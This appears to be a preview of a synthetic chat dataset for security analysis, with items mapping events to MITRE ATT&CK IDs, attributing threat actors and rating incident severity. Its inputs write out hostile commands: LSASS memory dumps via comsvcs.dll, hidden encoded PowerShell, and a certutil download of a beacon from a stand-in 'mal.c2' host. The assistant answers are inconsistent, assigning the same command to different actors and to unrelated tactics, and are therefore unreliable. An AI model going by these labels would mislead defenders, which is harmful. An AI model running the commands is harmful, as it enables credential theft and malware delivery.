messages
listlengths
2
2
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0005\", \"TA0006\"], \"techniques\": [\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\"]}", "rol...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1096 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.23.244.10", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-Y0GQNUNDK1)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Discovery, Exfiltration", "role": "user" ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data from Active Directory, which may include current an...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3707 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-ZLMH9F696W)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Command and Control, Credential Access, Reconnaissance", "role": "user" },...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.109.169.204", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"T...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2871 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for changes made to scheduled jobs for unexpected modifications to execution launch", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036.004\", \"T1036\"]}", "role": "assistant"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"conf...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1783 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.78.70.149", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: C:\\Windows\\System32\\sethc.exe", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.008\", \"T1546\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"confidence...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-7ZVBIA6N7Z)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Collection, Lateral Movement", "role": "user" }, { "content": "{\"severit...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Chimera has harvested data from victim's e-mail including through execution of wmic /node: process call create \"cmd /c copy c:\\Users\\\\\\backup.pst c:\\windows\\temp\\backup.pst\" copy \"i:\\\\\\My Documents\\.pst\"copy...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.54.16.204", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0007\"], \"t...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-ZUCMCFLIQT)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3581 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.141.68.209", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3735 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.34.150.199", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T105...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-ESATCZ46MC)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Ramsay can use netstat to enumerate network connections.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1049\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-IRJTL9I6LC)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"se...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"co...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 739 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.84.187.158", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0006\"], ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3960 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc that would aid in the manipulation of data to hid...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.158.74.240", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-VH2L1SHCZM)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Credential Access, Command and Control, Execution", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3619 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.23.157.197", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"technique...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-A30ASQD1X3)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\": \"H...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.191.34.208", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0009\"], \"techniqu...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: xCaon has decoded strings from the C2 server before executing commands.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"conf...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.60.133.228", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0004\"], \"tec...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.", "role": "user" }, { "content...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-YH0QFIRY25)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Impact", "role": "user" }, { "content": "{\"sever...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Wingbird checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"tech...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.121.163.139", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techni...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-0TFIT50F7N)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1912 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Various implementations of CHOPSTICK communicate with C2 over SMTP and POP3.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.003\"]}", "role": "assist...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-5BPA5XXXJ6)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Defense Evasion, Reconnaissance, Persistence", "role": "user" }, { "...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: EnvyScout can write files to disk with JavaScript using a modified version of the open-source tool FileSaver.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.007\", ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: HALFBAKED can obtain screenshots from the victim.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: SMOKEDHAM can capture screenshots of the victim’s desktop.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-GQ1EYQLHK8)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Defense Evasion, Reconnaissance, Discovery", "role": "user" }, { "content": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3543 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-WUWZUKYRGL)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Execution, Credential Access, Initial Access", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\",...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.44.29.245", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-NL6JLLBNA2)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Defense Evasion, Persistence", "role": "user" ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2986 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.9.135.72", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1783 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-XT75UKFDD7)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution, Impact, Lateral Movement", "role": "user" }, { "conte...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Windows operating system also creates a registry key specifically associated with the creation of a scheduled task on the destination host at: Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\At1.", ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.152.125.168", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-EWJGJD80TU)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Criti...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-RB91MK2OQE)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severit...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2259 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.89.107.103", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1546.00...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.23.40.195", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The purpose is to download and execute an additional payload hosted on a compromised website: NavRAT", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "ass...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"te...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"confidence\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 751 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 689 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confi...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: gh0st RAT has a keylogger.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.001\", \"T1056\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: KOCTOPUS has relied on victims clicking on a malicious link delivered via email.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204\", \"T1204.001\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-XW2ZKQQE6Z)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence, Defense Evasion", "role": "user" }, { "content": "{\"s...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-KQPRCG9IRG)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-XP2XGIYA4W)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Persistence, Exfiltration, Collection", "role": "user" }, { "cont...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor the status of services involved in system recovery.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1490\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-44FHWJDW13)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Initial Access, Defense Evasion", "role": "user" }, { "content": "{...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2192 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.131.247.36", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0006...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.173.104.19", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA00...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.81.227.155", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-10H7CFF6UM)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Ex...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 980 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.77.68.207", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0011\", \"TA0002\"], \"tec...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2330 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: PROMETHIUM has used Registry run keys to establish persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\"]}", "role": "assista...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3796 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.56.169.211", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0011\", \"TA0009\"], \"tech...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: APT39 has used the post exploitation tool CrackMapExec to enumerate network shares.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1135\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: QakBot can use a variety of commands, including esentutl.exe to steal sensitive data from Internet Explorer and Microsoft Edge, to acquire information that is subsequently exfiltrated.", "role": "user" }, { ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.97.182.207", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.162.130.205", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0001\"], \"tech...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries can direct BACKSPACE to execute from the command line on infected hosts, or have BACKSPACE create a reverse shell.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\":...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: When possible, minimize time delay on event reporting to avoid prolonged storage on the local system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.002\", \"T...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.114.254.36", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1607 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.174.0.24", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniq...